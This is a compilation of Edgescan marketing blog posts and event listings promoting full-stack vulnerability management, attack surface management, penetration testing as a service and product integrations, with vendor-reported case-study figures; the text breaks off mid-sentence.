Edgescan Platform. Excerpt: Edgescan will be attending RSAC 2023 which is themed 'Stronger Together'. ### Blackhat USA PAST EVENT: 10-11 Aug 2022 | Las Vegas, NV One-on-One Sessions provided: A dedicated session with an Edgescan Solution Professional Answers to any questions about needs within your particular environment Updates on all about the latest developments of the Edgescan Platform Exclusive gift from Edgescan to take home ### The Smart Vulnerability Management Checklist – Six Important Approaches You Need to Adopt Today If you are considering adopting a “Smart” approach to your Vulnerability Management (VM) Program, we have put together a list of six top-of-mind items you need to consider before you go “Smart”:   Number 1 - Continuous Attack Surface Management (ASM) and API Discovery As new systems are deployed, decommissioned, or existing system changes and APIs are left unmanaged, new avenues of attack surface are introduced. You cannot protect what you cannot see. The good news is that there are Smart ASM and API Discovery solutions to provide full visibility coverage continuously. If your attack surface is ever-evolving, then your ASM and API Discovery approach must be continuous also.   Number 2 - Integrated Penetration Testing Automation can only get you so far. In general, automation and scanning tools do not detect certain issues including business logic and complex data-driven vulnerabilities. That’s where integrated Penetration Testing comes in. To verify and determine all vulnerabilities have been effectively closed, it is necessary to manually attempt to break the business logic of the application. This needs to be performed by experts whose technical expertise and enterprise business logic knowledge can truly go to the bottom of what the automated scanning tools have surfaced and provide in-depth analysis and verifiable conclusions to every possible exposure. Traditional calendar-scheduled penetration testing will not suffice – it must be in concert with your automated Vulnerability Management scanning solution.   Number 3 - Integrated Full Stack Approach Vulnerability Management (VM) with blind spots is not smart. Smart VM assesses vulnerability across the entire stack from the network to the application layer. Just as the hackers themselves welcome any weakness in any layer – they are quite accommodating in this respect – so too should the Smart VM solution address any issue regardless of the layer location. Even if you manually attempted to tie insights from each tool dedicated to each layer, there are correlations of incident detection between layers that you may miss. These correlations are precisely what an integrated full stack solution would detect.   Number 4 - Contextualized Alerts Traditional automated scanning solutions will provide incident alerts. They will provide a lot of them. But without knowing their context – what order of priority both on the business and technical side they should be placed in – it is challenging to determine how one should respond and with what urgency. And chasing every incident as if it has a Level 1 Risk Association tied to it is simply not sustainable. A Smart VM solution is designed so that in the onboarding phase, vulnerabilities can be classified to reflect both the technical and business risk they represent.   Number 5 - Smart Remediation Integration The Smartest of Vulnerability Management (VM) solutions will be effectively rendered useless if the insight and remediation guidance are not integrated into the daily operational support systems and workflow. The challenge is that typical Enterprise systems - risk, software development, and ticketing systems were not built to capture output from a Vulnerability Management solution. By creating an integrated workflow so that prioritized alerts and guidance are placed in the hands of the IT Support teams on their system of choice - remediation times can be drastically reduced.   Number 6 - Human Security Expertise To determine the meaning of each incident and what it truly represents in terms of real risk to the business, it takes a human – a skilled security expert – to make that assessment. And we call the overlay of human security expertise on top of the automated scanning tools - a hybrid approach. And it is smart in many ways. One of the most important benefits is simply taking out the noise – the false positives. The automated scanning tools enable the Vulnerability Management Program to scale, and the human dimension enables depth and accuracy.   Deeper Dive If you would like to learn more about the value of Smart Vulnerability Management approaches, click here to download your free White Paper: ### Nine Considerations to Orchestrate the Perfect Vulnerability Management (VM) War Room Of course every Global 3000 Enterprise wants a Vulnerability Management (VM) solution applied to the full stack. Orchestrating this effort requires you to take important considerations into account. Here are nine of them   The typical Global 3000 Enterprise now has several years under its belt leveraging automated scanning tools for each layer of the attack surface. However, orchestrating the integration of all the data fed from the evolving attack surface and the vulnerabilities from each IT layer is not straightforward. The good news is that the Vulnerability Management (VM) industry is now pivoting to full-stack solutions to make this orchestration much more efficient. Here are some top-of-mind considerations for both your organization and your new full-stack supplier you should include in your orchestration effort: Full Stack Tuning – Scanners must be tuned for each layer – from Web Applications to Networks to APIs. Human Intelligence Integration – To achieve both scale and depth - the scale of tuned automation scanning needs to be balanced with the depth of expert human interpretation and false-positive removal. Continuity - The assessments themselves must be continuous. Batched assessments spread out across the calendar year leave temporal gaps for would-be attackers. ASM and VM Convergence -The continuous scanning for vulnerabilities and attack surface component identification must be integrated. One cannot protect what one cannot see. Alert Unification – The reporting system needs to generate alerts for both security alerts and business-ranked intelligence across every layer into one unified interface. Administrative Layer – Ensure your VM supplier provides a separate instance of cloud control connected to your dedicated virtual machine. It’s your solution – you should be able to self-administrate. Client Privacy – You need to be able to control access attributes for your privacy needs so you can control what your VM supplier sees. Dedicated Tunnel – You should be provided with a dedicated tunnel from the supplier’s hosted platform that serves your specific scanning validation and assessment data. Operational Integration – Ensure that your supplier’s VM solution connects using APIs to your required IT Service Management and Dev Ops systems. Relevant contextualized and verified alerts should be integrated and automated into your daily workflow to ensure optimum remediation times.   If you would like to learn more about how to optimize your Vulnerability Management efforts, click below to learn more. ### Putting Your Full Stack Vulnerability Management Solution into Action – Three Practical Suggestions With power comes responsibility. Leverage all the value of your new Single Full Stack Vulnerability Management Platform with these three tips.     So Many Compelling Reasons to go Full Stack with Your Vulnerability Management Program You finally have decided to take the plunge. There are so many good reasons to go full-stack. Let’s remind ourselves of some of the important ones: Tool Proliferation – You are not alone. Gartner has told us that Enterprises on average have 16 tools in the Vulnerability Management Portfolio and 12% have 46 or more! (Gartner’s Top Security and Risk Trends for 2021) Consolidated View of Risk – The most obvious benefit - if you consolidate the full stack then your single unified dashboard will provide you with a consolidated picture of your risk. Lower Overhead and Lower Costs – Licensing costs are typically significantly lower for one solution and the overhead to support separate tools is dramatically reduced. Operational Efficiency – With one solution then there will be only one system generating tickets across the entire stack. This means only one place with consistent reporting to source alerts without a Business Intelligence tool and far easier integration to your own IT support system. Resilience – While Cost Reduction might initially be the driver – the same Gartner Report concludes that consolidation delivers lower risk.   Three Practical Suggestions Here are three top-of-mind items you should be considering when you first adopt a full-stack solution:   Number 1 - Be Smart About Pilots Do not cherry-pick one layer from a Single Full Stack Solution Vendor – that misses the point. Instead, pilot with a singular, full-stack solution that incorporates several layers. If you are concerned about over-investing in a solution in the pilot phase, then perhaps scope the pilot within only one business division or one geography to validate a single multi-layered experience.   Bonus List – The Layers You Should Consider In the context of Vulnerability Management – what exactly constitutes a “full-stack”? Web application layer (including APIs, Website, and Mobile) Hosting Environment layer (Web Application Server) Operating System of the Host Host Machine Services (Network Protocol and Services and Ports) Underlying Network (Associated Devices including IoT, Firewalls, Routers)   Number 2 - Leverage Your New Enlightened View of Risk Risk is not linear – how one communicates risk is traditionally challenging. One thousand issues with a score of 1 (Between a score of one to one hundred) yields a risk score of 1000 as opposed to one issue ranked at 98. But it’s that one 98-ranked issue that could present a significant issue for your business. With your new composite view of risk, you can build your platform to alert you on say a considerable business concern like the 98-score vulnerability. Basically, with a full-stack single solution, you can build weighted alerts, regardless of the layer location, to signal what matters the most. And that’s the whole point of the approach – to gain that holistic view.   Number 3 - Correlations are Key Remember, you now have a prepackaged singular solution. No more manual attempts at linking vulnerability source data from layer to layer. So, things like correlating a network issue with web application issues are now easily attainable. It’s much more intuitive with a combined view of risk against the entire full-stack. Indeed, your composite correlation-detecting viewpoint puts you on a level playing field (if not a superior position) to your attacker. If you would like to learn more about Full Stack Vulnerability Solutions, click below to download your free white paper     Full-Stack Security with NVM At Edgescan, we know full-stack security is essential. Our Network Vulnerability Management (NVM) provides comprehensive coverage for your entire technology stack, ensuring continuous monitoring and remediation. From Dublin to New York, we deliver solutions that protect your organization at every layer. ### Are False Positives Really a “Thing” in 2022 for Vulnerability Management Programs One would be tempted to think after a decade of refinement of automated scanning tools across the full stack, false positives, and the time-intensive process of validating them are a thing of the past. Exactly the opposite is true   Will Scanning Automation Delivery Vulnerability Management Nirvana? If there has been one theme to define the last decade of Vulnerability Management – it is the rise of automated scanning tools. The rise has been designed to deal with the ever-increasing number of attack surfaces and the frequency and ingenuity of the attacks themselves. In turn, the tools became more refined, more accurate, and expanded in scope to handle all the layers of the attack surface including not only the network but the application layer itself. As these trends continue one might reasonably ask - Are we heading to a utopian state? Are we reaching a point where the technology and its ability to handle the sheer volume of incidents outguns the attackers? Can we count on automated scanners to filter out false positives?   The View from the Trenches Is Not Pretty – It Is Actually Noisy The answer is a firm “No”. For those on the front line tasked with managing incidents, their day-to-day is not close to utopian. If it were to be described with one word, it would be Noise. Far from Vulnerability Management nirvana – the front-line staff leveraging automated scanning tools are now faced with a new herculean task. For all the scaling efficiencies automated tools delivered, they have effectively created a massive new problem. A significant amount of the alerts represent false positives (noise) – an alert that flags a vulnerability that does not exist. How, with the proliferation of automated alerts, do the tools separate the wheat from the chaff?   How bad is the False-Positive Verification Problem? While detection automation looks after the incident scale issue – it passes on a new scaling problem – dealing with the noise. “More than 60% of security professionals estimate their security function spend over 3 hours per day validating false positives. Nearly 30% are spending over 6 hours on this task. Most agree that it is too much, and the time could be better utilized. For most, it is the part of their job they like least.” – Infosecurity Europe 2021   We Have a Focus Issue “Nearly half of all cybersecurity alerts are false positives, and 75% of companies spend an equal amount of time, or more, on them than on actual attacks.” – Security Boulevard, 2021 Given the extent of false positives, Vulnerability Management teams must put in the time and resources to remove them. But when that typically takes as much time as dealing with actual attacks, the question naturally arises – Is there a more efficient way to manage them?   Is a Hybrid Solution the Answer? In conclusion, false positives and the process of validating them is a bigger “thing” than ever. Fortunately, there are Smart Vulnerability Management solution providers that provide a hybrid approach where a full-stack scanning solution is integrated with a team of expert security validators. With this approach, the Enterprise Vulnerability Management team can act now knowing all alerts presented are real and focus on what matters – securing the attack surface. To learn more about how Hybrid Solutions effectively deal with the False Positive validation process, click below to receive a free white paper ### Driving Smart Vulnerability Management (VM) Intelligence with Context Smart Vulnerability Management (VM) allows quick determination between critical, high, medium, and low risk. Context drives everything.   Context Matters Traditional automated scanning solutions will provide incident alerts. They will provide a lot of them. But without knowing their context – what order of priority both on the business and technical side they should be placed in –it is challenging to know how one should respond. And chasing every incident as if it has a Level 1 risk association tied to it is simply not sustainable.   Installing Smart Intelligence – It’s All About the Setup An effective and smart vulnerability management (VM) solution can be built so that in the onboarding phase, vulnerabilities can be classified to reflect both the technical and business risk they represent. Instead of trying to determine potential risk without a Smart VM approach, the alerts with a Smart VM solution will present themselves in context so that significant incidents can be dealt with in a timely and relevant way. Conversely, incidents that do not represent significant risk can be handled according to the severity of risk they represent.   But Every Business is Different Put simply, a Game Streaming company will have different concerns than a Financial Service company. The ability to offer a highly responsive game interaction user experience will not have the same high priority in a financial services context. It is specifically because of these different business contexts, that Smart VM solutions are designed with a built-in capability to rank incident-type against the specific technical and business risk for that organization. And finally, a Smart VM solution will have built-in automation to provide security and attack surface alerts with contextualized business and technical priority rankings.   All Incidents are Not Created Equal Web application Risk Density is typically vastly higher than non-web application assets. It is important that your Smart VM solution can provide you with an accurate assessment of the risk density of every threat. Smart VM means you can quickly determine between critical, high, medium, and low risk. Context drives everything.   Context in Action The Edgescan team leverages the Edgescan Platform to extract data across industries and geographies and can identify risks across the entire stack . Your current solution should be able to provide this context on the fly for your organization. Learn more about Edgescan's risk-based vulnerability management >> ### Ten Reasons Why a Full Stack Vulnerability Management Platform Matters A Singular Full Stack Vulnerability Management (VM) Platform Yields a Plurality of Benefits A major theme of Enterprise software platforms is one of simplification – the drive to one singular solution. But does a singular full-stack solution have merits in the context of a Vulnerability Management (VM) Program? Should the Enterprise Security team move from a point solution approach to a full-stack platform, including the network, web apps, external attack surface management (EASM), mobile devices, and API’s? We think they should and here are ten reasons why: Benefit #1 – Consolidated View of Risk – Consolidation of risk data across the stack delivers a consolidated view of risk so one can focus on what matters. Benefit #2 – Full Picture of All Assets – One cannot protect what one cannot see. A full-stack solution provides a complete picture of your evolving attack surface. Benefit #3 – Comprehensive Protection - If you have a full stack to protect, then you require a full-stack solution. The attacker does not care what layer they attack – they just want a window of opportunity anywhere in the stack. Benefit #4 – Efficiency – It’s quicker and requires less effort to validate each alert from a single full-stack platform and have a full picture of what matters. Attempting to upskill resources against each specialized tool and manually cobble verified results into a composite picture is less than optimal. Benefit #5 – Compliance – One needs a full-stack assessment. Compliance looks at risk regardless of where it is. Benefit #6 – Overhead – A point-solution approach introduces significant overhead including set-up time, specialized individual tool training, specialized tool support and updates, and multiple integration efforts. A full-stack singular solution reduces this overhead significantly. Benefit #7 – Resilience – A single, contained (pre-packaged) solution means that all the same data for the same service is validated in a single place. In contrast, multiple validation efforts across each point solution introduce more layers of potential errors. One validation effort across only one solution reduces error significantly. Accuracy drives resilience. Benefit #8 – Costs – Some large enterprises “manhandle” the integration problem to achieve a full-stack risk view – but many mid-sized organizations cannot simply afford that approach. And even for those that can – is that the wisest use of your security budget when single full-stack solutions are available? There will then be the ongoing support costs for a manual integration approach. Benefit #9 – Operational Headache – With layered point solutions, there will be multiple tickets with multiple vendors over one vulnerability, instead of a single solution that can port metadata over for a singular view of risk. And there is only one single point of contact for all alerts regardless of issue layer location. Benefit #10 – Strategic Alignment – The Enterprise management team simply wants to achieve desired business goals and wants to be able to effectively ensure that vulnerabilities that can have an impact on strategic goals are efficiently managed. One full-stack solution enables direct alignment between strategic business goals and the VM team’s focused efforts.     ### Infosecurity Europe 2022 PAST EVENT: 21-23 June 2022 | London One-on-One Sessions on each of the Infosec Europe event days provided: A dedicated session with an Edgescan Solution Professional Answers to any questions about needs within your particular environment Updates on all about the latest developments of the Edgescan Platform Exclusive gift from Edgescan to take home ### Attack Surface Management - Is It Acceptable To Let Things Die On The Vine? Visibility is of paramount importance in cyber security. We cannot secure what we cannot see. Is it acceptable to let things die on the vine? Enterprises invest a lot of time, money, and effort in getting services launched. From research to deployment, there are processes to help get projects off the ground. But, much like the space junk we have in orbit, there is often little thought given to what happens once these services have served their purpose. This seemingly innocuous behaviour poses a significant security risk. Unlike grapes on a vine, the risk doesn’t just wither away, it gets worse over time. Festering Vulnerability While there is a wide variety of causes, one thing is certain – legacy services and their related exposed surfaces become more vulnerable over time. Legacy services can vary depending on the type of business the enterprise is pursuing. Examples of legacy services can include: allowing a customer to access their business account online, providing updatable health records in a web application, mobile banking services, offering a public online gaming community database, or providing an internal web-client for access to servers and databases for developers. If we are not aware that the service has been allowed to die on the vine, we may not be adequately protecting a critical asset. Allowing old services to persist is not playing it safe – it is introducing your organization to a larger window of exposure and in most cases, completely unnecessary risk. Sometimes it’s not possible to end-of-life (EOL) a legacy service, so then countermeasures need to be deployed. Your Options The best option is to shut down legacy services when they are no longer needed and provide a re-introduction request option for when the business requires it. The second option – if a true business need currently persists – is to knowingly allow the service to be exposed and agree on an end-of-life schedule. It can then be shut down when it makes business sense while effectively managing risk in the meantime. What Can You Do Right Now if You Simply Do Not Know What is Live? If your management of archived assets has been less than stellar – and most enterprises do NOT have a good handle on this – you should perform a discovery audit of your entire attack surface. There are now dedicated automated solutions to perform this task continuously. These scanned results should be verified by in-house security experts or as part of hybrid solution with your Vulnerability Management provider. Once you have an accurate picture of your Attack Surface exposures, you can begin coordinating with business line managers to ensure that your decisions balance both business and security requirements. Ideally, any new technology or service will be deployed with an end-of-life plan in place. You should have a plan in place for retiring this technology even if it’s years in the future. Working with known managed risk instead of flying blind is fundamental in preventing significant negative events. If you would like to learn more about External Attack Surface Management. https://edgescanstage.wpengine.com/native-cloud-integration-for-asm-and-vulnerability-management/ Effective Attack Surface Management with ASM At Edgescan, we understand that managing your attack surface is critical in today’s dynamic threat environment. Our Attack Surface Management (ASM) service helps identify and mitigate risks across your entire digital presence. With our teams based in Dublin and New York, we ensure that no threat is left unchecked, providing you with comprehensive protection. ### Checklist for Selecting a Vulnerability Management Solution In 2022, there have been leaps and bounds made with more robust and complete Vulnerability Management solutions. The Global 3000 Enterprise now has the luxury to expect the solution to meet a very high bar. But does the Enterprise know what it wants? The balance between a scalable and accurate vulnerability management solution has been top of mind for Enterprises for some time now (as it should be). Looking to solve for both, though, should not be at the expense of other requirements. We have put together a checklist of eight important requirements that might benefit your evaluation of Vulnerability Management Solutions in 2022. Time Zones – Global means global. Make sure your service follows the sun. Bonus Checklist Item – make sure that your supplier does not achieve this through partnered or sub-contracted relationships that could affect operational efficiency. It should be 100% in-house. Service quality consistency can suffer when your supplier attempts to cobble together third parties to meet your time zone requirements. Disaster Management – Your provider should be able to demonstrate resilient zones across geographic areas and offer a two-to-three second return to service after any failure. Performance – The platform interface simply should not demonstrate any meaningful lag for human operations. Page performance should be under 3 seconds even under heavy load times. Contextualized Alerts – Your selected solution should provide custom alerts that can be contextualized for your needs within your country, industry, and company. Integration to Enterprise Support Systems – Your solution should be able to take ranked alerts and automatically communicate them in a format your operational support teams already leverage (IT Service Management System, IM, Tickets, email etc.) Prioritization of Assets – The system should be pre-built to allow asset types to be prioritized against what matters the most for each client’s business. Your critical items and not-so critical items must be categorized accordingly. Modular Platform – The solution needs to be adaptable to accommodate clients who only need a sub-set of the services on offer or want to scale to the full platform over time. Your provider must demonstrate value against your immediate departmental needs (API, Network, Web Apps, Attack Surface Management, Pen Testing etc.) and demonstrate long-term capacity to scale. Client Self-Service – Ideally clients themselves should be able to configure what alerts – network, web apps, API etc. - and what locations - North American server, European Database etc. - get alerted. Ultimately this is your tool, and you need the ability to steer it strategically yourself. If you would like to learn more about the steps the Edgescan engineering and security team took to create the ideal Vulnerability Management War Room, download our whitepaper from the link below. ### Use Case – Delivering Both on Scale and Accuracy For years Edgescan has been working with a large media conglomerate known for entering their most trusted security suppliers into bakeoffs to ensure they have a best-in-class risk posture. They have the budget and the aptitude to try any innovative solution that can help to that end. Our years of working together have shaped how Edgescan understands the challenge Enterprises face today. The Challenge – Deliver Scale and Accuracy for Web Application Vulnerability Management (VM) Program Fueled by growing technology adoption, the client needed to find a new solution to scale their Vulnerability Management (VM) program. Their existing solutions simply could not scale while providing accuracy with over 5000 web applications across all of their corporate entities and geographies.   Edgescan Initial Solution Edgescan quickly established a baseline security posture for all 5000 web applications across all their business units. Within one month, Edgescan was able to demonstrate it could handle the scale while providing accuracy. As the client environments grew and more applications required scanning, the Edgescan solution continued to provide accuracy under increased loads. Previously with their existing solution and their staff manually validating the results, their team could not keep up with the number of alerts they were receiving. With Edgescan’s hybrid platform, the validation process easily kept up with the frequency of alerts.   Expanding from Web Applications to Penetration Testing Based on the success of the Web Application Vulnerability Management solution, the client turned to Edgescan for Penetration Testing as a Service (PTaaS). They had previously struggled to effectively secure optimal penetration testing that could keep up with their expanding attack surface. They could not scale even when they engaged with third party contractors. So Edgescan, armed with Web Application Vulnerability Management intelligence, started ranking each system in concert with the client’s business requirements. Edgescan prioritized vulnerabilities for Pen Testing that presented critical risks and were important to the organization. Because all Pen Testing and vulnerability scanning was done in one centralized platform, the client was able to effectively scale their pen testing needs as required.   Proving Value for Five Years Running As mentioned earlier, the client has the budget and security acumen to effectively test all established and new and upcoming security tools. Basically, they can work with anyone. Each year, the Edgescan solution is placed in a head to head competition (a "bake-off") against competitive solutions. In each of the last five years, Edgescan has conclusively won every competition and continues to hold a strategic and trusted role within the client’s overall Cyber Security Program.   Engagement Numbers   Day 1 - 4 Hours to Hack It only took 4 hours for Edgescan to hack into the client’s system the first time.   Day 300 - 48 hours to Hack After the Edgescan Solution was deployed, it took 48 hours to hack into their system.   5000 Web Applications The number of web applications the Edgescan Platform scaled to without sacrificing accuracy.   24 Hours and 500 Websites Amount of time for Edgescan to onboard 500 new websites (as opposed to weeks or months).   50% Cost Savings Reduced the cost of pen testing by up to 50% without reducing coverage or accuracy.   2 vs 8 Staff Members Initially, without the Edgescan Solution, the client was assigning eight members of their security team to validate automated results. With the Edgescan solution they now only assign two members and deploy the remaining six staff for strategic activities.   If you would like to learn more about scaling with accuracy, click below     Scaling Security with PTaaS We understand the importance of balancing scalability with accuracy. That’s why our Penetration Testing as a Service (PTaaS) provides reliable testing for enterprises of all sizes. With offices in Dublin and New York, we ensure your security posture is strong no matter how large your operations. ### RSA Conference 2022 PAST EVENT: 6-9 June 2022 | San Francisco One-on-One Sessions provided: A dedicated session with an Edgescan Solution Professional Answers to any questions about needs within your particular environment Updates on all about the latest developments of the Edgescan Platform Exclusive gift from Edgescan to take home ### Injecting Smart Vulnerability Management (VM) into IT Ops If you are a follower of our blog series, you will note that we advocate three basic tenets to achieve Smart Vulnerability Management:   Full-Stack – A single solution across the entire attack surface – including the network and web applications and API’s – enables one single touchstone of truth. Hybrid – Scanning solution integrated with human expertise delivers alerts that are virtually 100% free of False Positives. Ops Integration – Integration with IT Management Service tools ensures the IT Ops staff has accurate ranked business alerts within their systems to ensure optimal remediation SLA’s. Typically the benefits of the Full-Stack and Hybrid models are top of mind when considering our solution. However, we recently had one of our larger global enterprise clients report back that the Ops Integration feature drove their decision to embrace our Smart Vulnerability Management solution. Ops Integration provides a huge benefit, enabling the IT department to focus on alerts that really matter without disturbing their daily workflow. This emphasis on their decision-making process highlighted the importance of Ops Integration and inspired us to share the engagement details with our community. The Details This client found API discovery and assessment to be particularly challenging. They did not have an accurate solution in play and they did not have an efficient way to communicate with IT which API issues required timely remediation. The client required that their API discovery and assessment solution integrate with their IT service management platform – ServiceNow. They were using the VM Module within ServiceNow. However, the massive project to create an end-to-end service integration with their current ecosystem of scanning tools was far too expensive and would take too much time. Edgescan provided an ROI analysis showing the amount of headcount and associated cost reduction that the Edgescan API solution would yield. However, the compelling reason driving the client to select the Edgescan solution was that it could quickly integrate with ServiceNow without significant costs. The client had projected an 18-month duration to integrate their original group of scanning tools with ServiceNow. With Edgescan’s hosted platform, the integration only took one month.   Accuracy was a Gate Keeper In addition to saving time on the integration process, the client also enjoyed the accuracy of having false-positive-free output. This was key in driving initial acceptance of the service. Initially Edgescan discovered 2200 API’s when the client’s current solution only reported 500. This was more than enough to impress the client with solution accuracy.   Takeaways What can we learn from an organization that put such an emphasis on Ops Integration? Getting Priorities Straight – the fact Ops Integration figured so heavily into their decision-making is a reminder of the importance of placing Vulnerability Management intelligence into the hands of those who will fix the issue. Without this in play, Mean-Time to Repair (MTTR) metrics will suffer. Sheer Number of Automated Scanning Solutions is a Problem – Gartner and others have stated that the overhead costs of managing multiple point scanning solutions is significant. The costs and time to integrate into an IT Management Service tool is yet another reason to consolidate. Hosted Solutions Offer Integration Advantages – a home-grown ecosystem of Vulnerability Management tools is inherently difficult to integrate. A hosted solution pre-baked with integrations into major IT Service Management tools like ServiceNow enables one to focus on ranking automated alerts for effective remediation times on things that matter. If you would like to learn more about injecting Smart Vulnerability Management into your IT Operations, click below. ### DBIR 2022 Edgescan Observations The Verizon DBIR 2022 report is out and as always it looks and reads like a strong team of dedicated security experts developed the report; thank you to Gabriel Basset, Charles Hylender and Alex Pinto and the wider team for such a great analysis. Edgescan was lucky to be chosen as a supplier of vulnerability analytics data to the report for our third year. We are very proud that our triaged, full stack, vulnerability intel based on thousands of PTaaS (Penetration Testing as a Service) assessments and continuous vulnerability scans, is of use to the development of this report. The key items resonate with what we see at edgescan. The problems don’t change that much and possibly just get more commonplace and larger as the years go by. ​Ransomware has increased substantially in breaches: Ransomware is not going away. The misunderstanding of ransomware is that it’s a highly complicated attack using lots of hi-tech, AI and ML. The reality is that many ransomware attacks include the human element. Targeted attacks use intelligent criminals to enumerate and scope a firms attack surface. Attacks may be a result of a phishing attack and once executed a talented team take over, or the breach may be the result of exploitation of a CVE, unpatched, exposed or misconfigured endpoint or application. A significant part of ransomware readiness is resilience. This includes frequent assessment of production assets, network, web applications, API and also ASM to help ensure continuous visibility and exposure. The fundamentals of a decent cyber posture are still the same, it’s the threat landscape that evolves.     Incidents are driven by four main types of access to the victim’s estate: Credentials, Phishing, Exploiting vulnerabilities and Botnets Vulnerability exploitation is still an issue. It has been a core issue for years. Credential theft is also the result of vulnerability exploitation which feeds further account breach. Not much has changed in terms of types of attack. From an attackers standpoint, why change something that works?   The Human Element is still a pervasive issue across the breach landscape I’m unsure if we can remove the “human element” from cyber security in terms of attackers or defenders. The human element is (still) the most advanced tool for depth of understanding, complex exploitation and intelligent defence. The bottom line here is we need humans to fight humans, fight fire with fire. Software alone fighting the “human element” Its destined for failure but software /automation combined with humans, works a treat and helps with scale, depth and accuracy. Misconfiguration errors have continued to decrease, a potential sign of hope that internet-exposed cloud resources are diminishing. Making humans “bionic” in terms of cyber posture, reactiveness, scale vs depth and accuracy can bring a huge return on investment to any business.   Simplifying Data Security with DAST The DBIR report underscores the growing risks to application-layer security. Our Dynamic Application Security Testing (DAST) identifies and remediates vulnerabilities, keeping your applications safe. With offices in Dublin and New York, we’re committed to helping you navigate today’s complex security challenges. ### Optimal VM Through Design - Leveraging UX Design to Help Reduce the Noise and Focus on What Matters If you have been following our thought leadership series, you will know that Edgescan’s core approach to achieving optimal Vulnerability Management is to remove noise and enable security professionals to focus on what really matters. The two-pronged method for achieving this goal is to get rid of false positives (aka the noise) through a hybrid model and by offering a single touchstone of truth with a full stack VM platform. We call this the Smart VM approach. But another key element of noise decluttering and enabling actionable intelligence is in the design of the Alert Dashboard itself.   The Design Challenge – Noise Reduction Theme Often designers are mostly concerned about a brand theme they are trying to invoke. But in this case, the UX designers were charged with a very important functional task - enabling “noise reduction”. The UX was built with design principles around ‘noise-reduction’ by simplifying complexity and reducing clutter from the user’s experience by only exposing them to relevant information. Design Highlights We seized on opportunities to innovate on the user experience at every step, including:   Focus on What Matters - a single action on the main dashboard to highlight priority issues. Intelligent Asset Searches - improving the filtering of assets, placing the information users need at their fingertips. Rapid Issue Ranking through Color Choices - The final color palette is fully color-blind accessible. Traffic light systems were used in all critical areas, so the information was understandable, even at first use. Personalization - The dashboard system was designed so every user would have a personalized experience based on their user profile.   Tone Balance – Friendly vs Serious To provide a distinctive look and feel, we wanted the design aesthetic to convey an appealing, clean, and inviting interface. Yet, it also needed to convey an air of assertive professionalism, appropriate to the serious tasks the users (both our security team and our client users) perform with the software. We worked to balance these contradicting requirements, while staying true to our established brand identity. The UI is optimized based on responsive design principles and the pattern library is delivered using atomic design methodology. This gives us the flexibility to integrate and develop new features instantly. As Edgescan Product Architect, David Kennefick explains, “The comprehensive component library ensures developers aren’t in danger of spending time making decisions outside their area of expertise, bringing confidence that their work will reach a high visual standard.”   Bonus Benefit – Time Savings The new interface not only reflects our competitive advantage; it also delivers valuable time-saving solutions for our users. As David Kennefick explains, “Support and overhead costs for onboarding and training are reduced by introducing more intuitive design, combined with more ways to authenticate. It’s much easier for our clients to train new staff on the Edgescan platform.” Validating complex security risks takes time and resources, and reducing the complexity of these tasks became the cornerstone for every design decision.   Measurable Benefits Our customers are now able to generate reports up to 25% faster and decision-making times are reduced by up to 15%, which is proof of huge time savings for our clients. The new application design also directly reflects what makes us stand out from the competition – our unique focus on noise reduction. The new Edgescan UI has been awarded the prestigious iF Design Awards and Good Design Awards 2021. It has been described by ITSecurityguru.org (5/5 in almost all ratings) as “very well designed…making false positives a thing of the past.”     To learn more about the Edgescan Platform and see a demo of the award-winning design, click the button below:   Reducing Noise with NVM We understand the challenges of dealing with overwhelming cybersecurity alerts. Our Network Vulnerability Management (NVM) helps you cut through the noise and focus on critical risks. From Dublin to New York, we make vulnerability management smarter and more efficient. ### Tableau Integration with Edgescan Edgescan is excited to announce the availability of a fully supported Tableau integration. In the era of big data, most companies look to use Business Intelligence & Data Analysis tools to analyze their business data to make more informed, intelligent decisions. Business Intelligence tools such as Tableau allow organizations to visualize this data in the form of worksheets, dashboards, and reports. Leveraging the Tableau integration, users can fetch data across all aspects of Edgescan. Including information in relation to assets, vulnerabilities, and plenty more. Edgescan & Tableau together form a perfect combination for any team looking to use data to plan and execute long & short-term goals and to affect the value derived from using Edgescan. Below are three ways users can use the power of Edgescan & Tableau: Bring in full-stack vulnerability datasets together for easy analysis to supply a single source of truth. Understand and manage vulnerabilities in your organization using intuitive worksheets, dashboards, and reports. Find potential areas of risk by applying endless different techniques within Tableau. For more information on how to activate this integration, please visit our dedicated Tableau integrations page by clicking the button below.   Tableau Integration with Edgescan We’ve integrated with Tableau to provide better visualization and insights into your vulnerabilities. Our Attack Surface Management (ASM) ensures that you can monitor and secure your digital assets effectively. Whether you’re in Dublin or New York, we help you make data-driven decisions to strengthen your security. ### DevOps Best Practices Webinar PRESENTERS: Eoin Keary | Jim Manico Eoin and Jim give an introduction to DevOps and DevSecOps with a CD/CI focus. WATCH NOW > Excerpt: An introduction to DevOps and DevSecOps with a CD/CI focus. ### Why is the VM Industry Proliferated with Point Solutions? It seems almost obvious that a single, composite view is superior to a layered approach. So one must ask – Why is the industry proliferated with the point solution approach? How Did We Get Here? The most straight-forward explanation is simply the fact that the underlying technology itself developed in a piecemeal fashion. The specialized tools, and expertise to manage them, organically reflect the history of technology development. Attacking as a practice, predates IT and internet – there were “telephone hacks” for example before IT and web surfaced. As attackers developed approaches to leverage new access points, cyber security suppliers developed tools for those new layers of concern. The Marketplace Itself Embraced Point Solutions As each layer-focused toolset matured, the industry would position and rank them within the scope of each layer. The question was (and still currently is for the industry) what tool is best for each layer? The more important question should have been (and should be today), how can I have a more accurate and more comprehensive view as the attacker? How can I have a solution that accurately detects vulnerabilities and weakness that matter to our organization regardless of where they occur? How can I focus on what really matters? How Bad is the Problem? While it might seem intuitive in the abstract to advocate for a single, full-stack solution – does the industry reality reflect the fact that we have built up an unwieldy plethora of point solutions dedicated to each stack layer? Is the CISO officer really loaded with an unmanageable amount of point solution tools? The answer is – It’s probably worse than you imagined. Houston, We Have Proliferation Problem Here are some interesting highlights from Gartner’s Top Security and Risk Trends for 2021: Security Leaders have Too Many Tools – What’s the number? – SIXTEEN. Yes, sixteen or more tools in their portfolio! And 12% have 46 or more!What’s the Problem with Proliferation?  - Security Ops has become too complex and requires too much headcount to manage it all.How Many Enterprises Recognize the Need for a Fix - 80% of organizations are interested in a vendor consolidation strategy!Solution Provider Response - Large security vendors are responding with better integrated products but not taking on the challenge of a full stack solution.Correcting History is Not Easy - Consolidation is not easy. According to Gartner on average it takes YEARS to roll out.Surprising Conclusion – Lower Cost with Improved Security Posture – While Cost Reduction might initially be the driver, consolidation delivers both streamlined operations and lower security risk. Takeaway It is a problem. It’s a big problem. And the industry wants to fix the problem. Does History Define Our Vulnerability Management (VM) Approach? Now here is the rub. If a Cyber Security Department has followed the industry path of an individual layered approach, does it have to make the best of a 